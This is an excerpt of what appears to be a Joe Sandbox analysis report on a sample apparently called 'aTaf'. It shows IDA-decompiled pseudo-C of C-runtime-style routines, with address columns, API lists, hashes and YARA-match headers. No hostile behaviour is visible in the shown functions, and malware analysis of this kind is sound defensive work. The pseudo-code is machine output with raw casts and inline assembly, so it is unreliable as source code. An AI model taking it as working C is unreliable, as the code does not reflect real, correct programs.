                              				_push(0x421490);
                              				E0040E1D8(__ebx, __edi, __esi);
                              				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                              				_t15 =  *0x422e34; // 0xfffffffe
                              				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                              					E0040D6E0(_t25, 0xd);
                              					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                              					_t33 =  *(_t31 + 0x68);
                              					 *(_t34 - 0x1c) = _t33;
                              					__eflags = _t33 -  *0x422d38; // 0x1fd1638
                              					if(__eflags != 0) {
                              						__eflags = _t33;
                              						if(_t33 != 0) {
                              							_t23 = InterlockedDecrement(_t33);
                              							__eflags = _t23;
                              							if(_t23 == 0) {
                              								__eflags = _t33 - 0x422910;
                              								if(__eflags != 0) {
                              									_push(_t33);
                              									E0040B6B5(_t25, _t31, _t33, __eflags);
                              								}
                              							}
                              						}
                              						_t21 =  *0x422d38; // 0x1fd1638
                              						 *(_t31 + 0x68) = _t21;
                              						_t33 =  *0x422d38; // 0x1fd1638
                              						 *(_t34 - 0x1c) = _t33;
                              						InterlockedIncrement(_t33);
                              					}
                              					 *(_t34 - 4) = 0xfffffffe;
                              					E00414067();
                              				} else {
                              					_t33 =  *(_t31 + 0x68);
                              				}
                              				if(_t33 == 0) {
                              					E0040E79A(_t29, _t31, 0x20);
                              				}
                              				return E0040E21D(_t33);
                              			}










                              0x00413fcc
                              0x00413fcc
                              0x00413fcc
                              0x00413fcc
                              0x00413fce
                              0x00413fd3
                              0x00413fdd
                              0x00413fdf
                              0x00413fe7
                              0x00414008
                              0x0041400e
                              0x00414012
                              0x00414015
                              0x00414018
                              0x0041401e
                              0x00414020
                              0x00414022
                              0x00414025
                              0x0041402b
                              0x0041402d
                              0x0041402f
                              0x00414035
                              0x00414037
                              0x00414038
                              0x0041403d
                              0x00414035
                              0x0041402d
                              0x0041403e
                              0x00414043
                              0x00414046
                              0x0041404c
                              0x00414050
                              0x00414050
                              0x00414056
                              0x0041405d
                              0x00413fef
                              0x00413fef
                              0x00413fef
                              0x00413ff4
                              0x00413ff8
                              0x00413ffd
                              0x00414005

                              APIs
                              • __getptd.LIBCMT ref: 00413FD8
                                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                              • __amsg_exit.LIBCMT ref: 00413FF8
                              • __lock.LIBCMT ref: 00414008
                              • InterlockedDecrement.KERNEL32(?), ref: 00414025
                              • InterlockedIncrement.KERNEL32(01FD1638), ref: 00414050
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                              • String ID:
                              • API String ID: 4271482742-0
                              • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                              • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                              • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                              • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __getptd.LIBCMT ref: 0051423F
                                • Part of subcall function 0051099C: __getptd_noexit.LIBCMT ref: 0051099F
                                • Part of subcall function 0051099C: __amsg_exit.LIBCMT ref: 005109AC
                              • __amsg_exit.LIBCMT ref: 0051425F
                              • __lock.LIBCMT ref: 0051426F
                              • InterlockedDecrement.KERNEL32(?), ref: 0051428C
                              • InterlockedIncrement.KERNEL32(00422D38), ref: 005142B7
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                              • String ID:
                              • API String ID: 4271482742-0
                              • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                              • Instruction ID: 29d04ea5ad976c42c986b780625f30dc3ba3deee93aaa7401a0522954d630e2a
                              • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                              • Instruction Fuzzy Hash: C401C435A01622ABEB21AB64980A7EEBF60BF84720F541415FC30A72D1C77469C2CFD9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $2$l
                              • API String ID: 0-3132104027
                              • Opcode ID: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                              • Instruction ID: 13c01fea6e247106def553ad4bd6de0e1ad7105865db91c0b359b0514de1b183
                              • Opcode Fuzzy Hash: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                              • Instruction Fuzzy Hash: D541E338845AA98EFF348E25889D3F8BFB1BB01351F1405CAC6A966191C7754EC7CF49
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __calloc_crt
                              • String ID: P$B$`$B
                              • API String ID: 3494438863-235554963
                              • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                              • Instruction ID: c7311ca627173f9174803cca6d3939f1e2586de57efa71bc9a1d7673eee42148
                              • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                              • Instruction Fuzzy Hash: 02110A323086155BF7348F1CBC55B692B91FBC47247644636E611CB6E4E770DC834758
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 65%
                              			E00413610() {
                              				signed long long _v12;
                              				signed int _v20;
                              				signed long long _v28;
                              				signed char _t8;
                              
                              				_t8 = GetModuleHandleA("KERNEL32");
                              				if(_t8 == 0) {
                              					L6:
                              					_v20 =  *0x41fb50;
                              					_v28 =  *0x41fb48;
                              					asm("fsubr qword [ebp-0x18]");
                              					_v12 = _v28 / _v20 * _v20;
                              					asm("fld1");
                              					asm("fcomp qword [ebp-0x8]");
                              					asm("fnstsw ax");
                              					if((_t8 & 0x00000005) != 0) {
                              						return 0;
                              					} else {
                              						return 1;
                              					}
                              				} else {
                              					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                              					if(__eax == 0) {
                              						goto L6;
                              					} else {
                              						_push(0);
                              						return __eax;
                              					}
                              				}
                              			}







                              0x00413615
                              0x0041361d
                              0x00413634
                              0x004135e0
                              0x004135e9
                              0x004135f5
                              0x004135f8
                              0x004135fb
                              0x004135fd
                              0x00413600
                              0x00413605
                              0x0041360f
                              0x00413607
                              0x0041360b
                              0x0041360b
                              0x0041361f
                              0x00413625
                              0x0041362d
                              0x00000000
                              0x0041362f
                              0x0041362f
                              0x00413633
                              0x00413633
                              0x0041362d

                              APIs
                              • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: IsProcessorFeaturePresent$KERNEL32
                              • API String ID: 1646373207-3105848591
                              • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                              • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                              • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                              • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 84%
                              			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                              				void* __ebx;
                              				void* __ebp;
                              				signed int _t12;
                              				void* _t21;
                              				int _t25;
                              				void* _t30;
                              				int _t32;
                              				char* _t35;
                              
                              				_t21 = __edx;
                              				_t35 = _a4;
                              				_t17 = __ecx;
                              				if(_t35 != 0) {
                              					_t25 = lstrlenA(_t35) + 1;
                              					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                              					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25);
                              					asm("sbb esi, esi");
                              					_t30 =  ~_t12 + 1;
                              					if(_t30 != 0) {
                              						_t12 = GetLastError();
                              						if(_t12 == 0x7a) {
                              							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                              							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                              							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                              							asm("sbb esi, esi");
                              							_t30 =  ~_t12 + 1;
                              						}
                              						if(_t30 != 0) {
                              							_t12 = E00401030();
                              						}
                              					}
                              					return _t12;
                              				} else {
                              					 *__ecx = _t35;
                              					return __eax;
                              				}
                              			}











                              0x004018f0
                              0x004018f2
                              0x004018f6
                              0x004018fa
                              0x00401917
                              0x0040191a
                              0x0040192f
                              0x00401939
                              0x0040193b
                              0x0040193e
                              0x00401940
                              0x00401949
                              0x0040195e
                              0x0040196b
                              0x00401980
                              0x0040198a
                              0x0040198c
                              0x0040198c
                              0x0040198f
                              0x00401991
                              0x00401991
                              0x0040198f
                              0x0040199a
                              0x004018fc
                              0x004018fc
                              0x00401900
                              0x00401900

                              APIs
                              • lstrlenA.KERNEL32(?), ref: 00401906
                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                              • GetLastError.KERNEL32 ref: 00401940
                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide$ErrorLastlstrlen
                              • String ID:
                              • API String ID: 3322701435-0
                              • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                              • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                              • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                              • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?), ref: 00501B6D
                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 00501B96
                              • GetLastError.KERNEL32 ref: 00501BA7
                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00501BBF
                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00501BE7
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide$ErrorLastlstrlen
                              • String ID:
                              • API String ID: 3322701435-0
                              • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                              • Instruction ID: e82868bea4cd430e3b28be350d4ee3ac29f4f7d3e9dbeb1fdf3af2a89dcd770e
                              • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                              • Instruction Fuzzy Hash: D511C4312007547BD3309755CC89F6B7F6CEBC6BA9F008118FD459A281D721AC04C6B9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E0040C748(void* __edx, void* __esi, char _a4) {
                              				signed int _v8;
                              				signed int _v12;
                              				signed int _v16;
                              				void* __ebx;
                              				void* __edi;
                              				void* __ebp;
                              				signed int _t70;
                              				signed int _t71;
                              				intOrPtr _t73;
                              				signed int _t75;
                              				signed int _t81;
                              				char _t82;
                              				signed int _t84;
                              				intOrPtr* _t86;
                              				signed int _t87;
                              				intOrPtr* _t90;
                              				signed int _t92;
                              				signed int _t94;
                              				void* _t96;
                              				signed char _t98;
                              				signed int _t99;
                              				intOrPtr _t102;
                              				signed int _t103;
                              				intOrPtr* _t104;
                              				signed int _t111;
                              				signed int _t114;
                              				intOrPtr _t115;
                              
                              				_t105 = __esi;
                              				_t97 = __edx;
                              				_t104 = _a4;
                              				_t87 = 0;
                              				_t121 = _t104;
                              				if(_t104 != 0) {
                              					_t70 = E0040FA20(__edx, _t104, _t104);
                              					__eflags =  *(_t104 + 4);
                              					_v8 = _t70;
                              					if(__eflags < 0) {
                              						 *(_t104 + 4) = 0;
                              					}
                              					_push(1);
                              					_push(_t87);
                              					_push(_t70);
                              					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                              					__eflags = _t71 - _t87;
                              					_v12 = _t71;
                              					if(_t71 < _t87) {
                              						L2:
                              						return _t71 | 0xffffffff;
                              					} else {
                              						_t98 =  *(_t104 + 0xc);
                              						__eflags = _t98 & 0x00000108;
                              						if((_t98 & 0x00000108) != 0) {
                              							_t73 =  *_t104;
                              							_t92 =  *(_t104 + 8);
                              							_push(_t105);
                              							_v16 = _t73 - _t92;
                              							__eflags = _t98 & 0x00000003;
                              							if((_t98 & 0x00000003) == 0) {
                              								__eflags = _t98;
                              								if(__eflags < 0) {
                              									L15:
                              									__eflags = _v12 - _t87;
                              									if(_v12 != _t87) {
                              										__eflags =  *(_t104 + 0xc) & 0x00000001;
                              										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                              											L40:
                              											_t75 = _v16 + _v12;
                              											__eflags = _t75;
                              											L41:
                              											return _t75;
                              										}
                              										_t99 =  *(_t104 + 4);
                              										__eflags = _t99 - _t87;
                              										if(_t99 != _t87) {
                              											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                              											_a4 = _t73 - _t92 + _t99;
                              											_t111 = (_v8 & 0x0000001f) << 6;
                              											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                              											if(__eflags == 0) {
                              												L39:
                              												_t66 =  &_v12;
                              												 *_t66 = _v12 - _a4;
                              												__eflags =  *_t66;
                              												goto L40;
                              											}
                              											_push(2);
                              											_push(0);
                              											_push(_v8);
                              											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                              											if(__eflags != 0) {
                              												_push(0);
                              												_push(_v12);
                              												_push(_v8);
                              												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                              												__eflags = _t81;
                              												if(_t81 >= 0) {
                              													_t82 = 0x200;
                              													__eflags = _a4 - 0x200;
                              													if(_a4 > 0x200) {
                              														L35:
                              														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                              														L36:
                              														_a4 = _t82;
                              														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                              														L37:
                              														if(__eflags != 0) {
                              															_t63 =  &_a4;
                              															 *_t63 = _a4 + 1;
                              															__eflags =  *_t63;
                              														}
                              														goto L39;
                              													}
                              													_t94 =  *(_t104 + 0xc);
                              													__eflags = _t94 & 0x00000008;
                              													if((_t94 & 0x00000008) == 0) {
                              														goto L35;
                              													}
                              													__eflags = _t94 & 0x00000400;
                              													if((_t94 & 0x00000400) == 0) {
                              														goto L36;
                              													}
                              													goto L35;
                              												}
                              												L31:
                              												_t75 = _t81 | 0xffffffff;
                              												goto L41;
                              											}
                              											_t84 =  *(_t104 + 8);
                              											_t96 = _a4 + _t84;
                              											while(1) {
                              												__eflags = _t84 - _t96;
                              												if(_t84 >= _t96) {
                              													break;
                              												}
                              												__eflags =  *_t84 - 0xa;
                              												if( *_t84 == 0xa) {
                              													_t44 =  &_a4;
                              													 *_t44 = _a4 + 1;
                              													__eflags =  *_t44;
                              												}
                              												_t84 = _t84 + 1;
                              												__eflags = _t84;
                              											}
                              											__eflags =  *(_t104 + 0xc) & 0x00002000;
                              											goto L37;
                              										}
                              										_v16 = _t87;
                              										goto L40;
                              									}
                              									_t75 = _v16;
                              									goto L41;
                              								}
                              								_t81 = E0040BFC1(__eflags);
                              								 *_t81 = 0x16;
                              								goto L31;
                              							}
                              							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                              							_t114 = (_v8 & 0x0000001f) << 6;
                              							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                              							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                              								goto L15;
                              							}
                              							_t103 = _t92;
                              							__eflags = _t103 - _t73;
                              							if(_t103 >= _t73) {
                              								goto L15;
                              							}
                              							_t115 = _t73;
                              							do {
                              								__eflags =  *_t103 - 0xa;
                              								if( *_t103 == 0xa) {
                              									_v16 = _v16 + 1;
                              									_t87 = 0;
                              									__eflags = 0;
                              								}
                              								_t103 = _t103 + 1;
                              								__eflags = _t103 - _t115;
                              							} while (_t103 < _t115);
                              							goto L15;
                              						}
                              						return _t71 -  *(_t104 + 4);
                              					}
                              				}
                              				_t86 = E0040BFC1(_t121);
                              				_push(0);
                              				_push(0);
                              				_push(0);
                              				_push(0);
                              				_push(0);
                              				 *_t86 = 0x16;
                              				_t71 = E0040E744(__edx, _t104, __esi);
                              				goto L2;
                              			}






























                              0x0040c748
                              0x0040c748
                              0x0040c752
                              0x0040c755
                              0x0040c757
                              0x0040c759
                              0x0040c77c
                              0x0040c781
                              0x0040c785
                              0x0040c788
                              0x0040c78a
                              0x0040c78a
                              0x0040c78d
                              0x0040c78f
                              0x0040c790
                              0x0040c791
                              0x0040c799
                              0x0040c79b
                              0x0040c79e
                              0x0040c773
                              0x00000000
                              0x0040c7a0
                              0x0040c7a0
                              0x0040c7a3
                              0x0040c7a9
                              0x0040c7b3
                              0x0040c7b5
                              0x0040c7b8
                              0x0040c7bd
                              0x0040c7c0
                              0x0040c7c3
                              0x0040c806
                              0x0040c808
                              0x0040c7f9
                              0x0040c7f9
                              0x0040c7fc
                              0x0040c81a
                              0x0040c81e
                              0x0040c8d8
                              0x0040c8de
                              0x0040c8de
                              0x0040c8e0
                              0x00000000
                              0x0040c8e0
                              0x0040c824
                              0x0040c827
                              0x0040c829
                              0x0040c843
                              0x0040c84a
                              0x0040c84f
                              0x0040c852
                              0x0040c857
                              0x0040c8d2
                              0x0040c8d5
                              0x0040c8d5
                              0x0040c8d5
                              0x00000000
                              0x0040c8d5
                              0x0040c859
                              0x0040c85b
                              0x0040c85d
                              0x0040c868
                              0x0040c86b
                              0x0040c88d
                              0x0040c88f
                              0x0040c892
                              0x0040c895
                              0x0040c89d
                              0x0040c89f
                              0x0040c8a6
                              0x0040c8ab
                              0x0040c8ae
                              0x0040c8c0
                              0x0040c8c0
                              0x0040c8c3
                              0x0040c8c3
                              0x0040c8c8
                              0x0040c8cd
                              0x0040c8cd
                              0x0040c8cf
                              0x0040c8cf
                              0x0040c8cf
                              0x0040c8cf
                              0x00000000
                              0x0040c8cd
                              0x0040c8b0
                              0x0040c8b3
                              0x0040c8b6
                              0x00000000
                              0x00000000
                              0x0040c8b8
                              0x0040c8be
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040c8be
                              0x0040c8a1
                              0x0040c8a1
                              0x00000000
                              0x0040c8a1
                              0x0040c86d
                              0x0040c873
                              0x0040c880
                              0x0040c880
                              0x0040c882
                              0x00000000
                              0x00000000
                              0x0040c877
                              0x0040c87a
                              0x0040c87c
                              0x0040c87c
                              0x0040c87c
                              0x0040c87c
                              0x0040c87f
                              0x0040c87f
                              0x0040c87f
                              0x0040c884
                              0x00000000
                              0x0040c884
                              0x0040c82b
                              0x00000000
                              0x0040c82b
                              0x0040c7fe
                              0x00000000
                              0x0040c7fe
                              0x0040c80a
                              0x0040c80f
                              0x00000000
                              0x0040c80f
                              0x0040c7ce
                              0x0040c7d8
                              0x0040c7db
                              0x0040c7e0
                              0x00000000
                              0x00000000
                              0x0040c7e2
                              0x0040c7e4
                              0x0040c7e6
                              0x00000000
                              0x00000000
                              0x0040c7e8
                              0x0040c7ea
                              0x0040c7ea
                              0x0040c7ed
                              0x0040c7ef
                              0x0040c7f2
                              0x0040c7f2
                              0x0040c7f2
                              0x0040c7f4
                              0x0040c7f5
                              0x0040c7f5
                              0x00000000
                              0x0040c7ea
                              0x00000000
                              0x0040c7ab
                              0x0040c79e
                              0x0040c75b
                              0x0040c760
                              0x0040c761
                              0x0040c762
                              0x0040c763
                              0x0040c764
                              0x0040c765
                              0x0040c76b
                              0x00000000

                              APIs
                              • __fileno.LIBCMT ref: 0040C77C
                              • __locking.LIBCMT ref: 0040C791
                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __decode_pointer__fileno__getptd_noexit__locking
                              • String ID:
                              • API String ID: 2395185920-0
                              • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                              • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                              • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                              • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __fileno.LIBCMT ref: 0050C9E3
                              • __locking.LIBCMT ref: 0050C9F8
                                • Part of subcall function 0050C228: __getptd_noexit.LIBCMT ref: 0050C228
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __fileno__getptd_noexit__locking
                              • String ID:
                              • API String ID: 630670418-0
                              • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                              • Instruction ID: 994b0f7bbbce94506ecccf93c34d00996691ae0a6f0c9716c8b40635893e7a79
                              • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                              • Instruction Fuzzy Hash: 5751B071E04209ABDB10CF68C886B6DBFB1FF46354F6483A9D915A72C1D730AE81DB80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 97%
                              			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                              				void* __edi;
                              				void* __esi;
                              				signed int _t30;
                              				signed int _t31;
                              				signed int _t32;
                              				signed int _t33;
                              				signed int _t35;
                              				signed int _t39;
                              				void* _t42;
                              				intOrPtr _t43;
                              				void* _t45;
                              				signed int _t48;
                              				signed int* _t53;
                              				void* _t54;
                              				void* _t55;
                              				void* _t57;
                              
                              				_t54 = __ebp;
                              				_t45 = __edx;
                              				_t42 = __ebx;
                              				_t53 = _a4;
                              				if(_t53 == 0) {
                              					L40:
                              					_t31 = _t30 | 0xffffffff;
                              					__eflags = _t31;
                              					return _t31;
                              				} else {
                              					_t43 = _a12;
                              					if(_t43 == 2) {
                              						goto L40;
                              					} else {
                              						_t30 = _t53[0xe];
                              						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                              							goto L40;
                              						} else {
                              							_t48 = _a8;
                              							if(_t53[0x17] != 0x77) {
                              								__eflags = _t43 - 1;
                              								if(_t43 == 1) {
                              									_t48 = _t48 + _t53[0x1a];
                              									__eflags = _t48;
                              								}
                              								__eflags = _t48;
                              								if(_t48 < 0) {
                              									goto L39;
                              								} else {
                              									__eflags = _t53[0x16];
                              									if(__eflags == 0) {
                              										_t33 = _t53[0x1a];
                              										__eflags = _t48 - _t33;
                              										if(_t48 < _t33) {
                              											_t30 = E004054F0(_t42, _t54, _t53);
                              											_t55 = _t55 + 4;
                              											__eflags = _t30;
                              											if(_t30 < 0) {
                              												goto L39;
                              											} else {
                              												goto L27;
                              											}
                              										} else {
                              											_t48 = _t48 - _t33;
                              											L27:
                              											__eflags = _t48;
                              											if(_t48 == 0) {
                              												L38:
                              												return _t53[0x1a];
                              											} else {
                              												__eflags = _t53[0x12];
                              												if(_t53[0x12] != 0) {
                              													L30:
                              													__eflags = _t53[0x1b] - 0xffffffff;
                              													if(_t53[0x1b] != 0xffffffff) {
                              														_t53[0x1a] = _t53[0x1a] + 1;
                              														_t48 = _t48 - 1;
                              														__eflags = _t53[0x1c];
                              														_t53[0x1b] = 0xffffffff;
                              														if(_t53[0x1c] != 0) {
                              															_t53[0xe] = 1;
                              														}
                              													}
                              													__eflags = _t48;
                              													if(_t48 <= 0) {
                              														goto L38;
                              													} else {
                              														while(1) {
                              															_t35 = 0x4000;
                              															__eflags = _t48 - 0x4000;
                              															if(_t48 < 0x4000) {
                              																_t35 = _t48;
                              															}
                              															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                              															_t55 = _t55 + 0xc;
                              															__eflags = _t30;
                              															if(_t30 <= 0) {
                              																goto L39;
                              															}
                              															_t48 = _t48 - _t30;
                              															__eflags = _t48;
                              															if(_t48 > 0) {
                              																continue;
                              															} else {
                              																goto L38;
                              															}
                              															goto L41;
                              														}
                              														goto L39;
                              													}
                              												} else {
                              													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                              													_t55 = _t55 + 4;
                              													_t53[0x12] = _t30;
                              													__eflags = _t30;
                              													if(_t30 == 0) {
                              														goto L39;
                              													} else {
                              														goto L30;
                              													}
                              												}
                              											}
                              										}
                              									} else {
                              										_push(0);
                              										_push(_t48);
                              										_push(_t53[0x10]);
                              										_t53[0x1b] = 0xffffffff;
                              										_t53[1] = 0;
                              										 *_t53 = _t53[0x11];
                              										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                              										__eflags = _t30;
                              										if(_t30 < 0) {
                              											goto L39;
                              										} else {
                              											_t53[0x1a] = _t48;
                              											_t53[0x19] = _t48;
                              											return _t48;
                              										}
                              									}
                              								}
                              							} else {
                              								if(_t43 == 0) {
                              									_t48 = _t48 - _t53[0x19];
                              								}
                              								if(_t48 < 0) {
                              									L39:
                              									_t32 = _t30 | 0xffffffff;
                              									__eflags = _t32;
                              									return _t32;
                              								} else {
                              									if(_t53[0x11] != 0) {
                              										L11:
                              										if(_t48 <= 0) {
                              											L17:
                              											return _t53[0x19];
                              										} else {
                              											while(1) {
                              												_t39 = 0x4000;
                              												if(_t48 < 0x4000) {
                              													_t39 = _t48;
                              												}
                              												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                              												_t55 = _t55 + 0xc;
                              												if(_t30 == 0) {
                              													goto L39;
                              												}
                              												_t48 = _t48 - _t30;
                              												if(_t48 > 0) {
                              													continue;
                              												} else {
                              													goto L17;
                              												}
                              												goto L41;
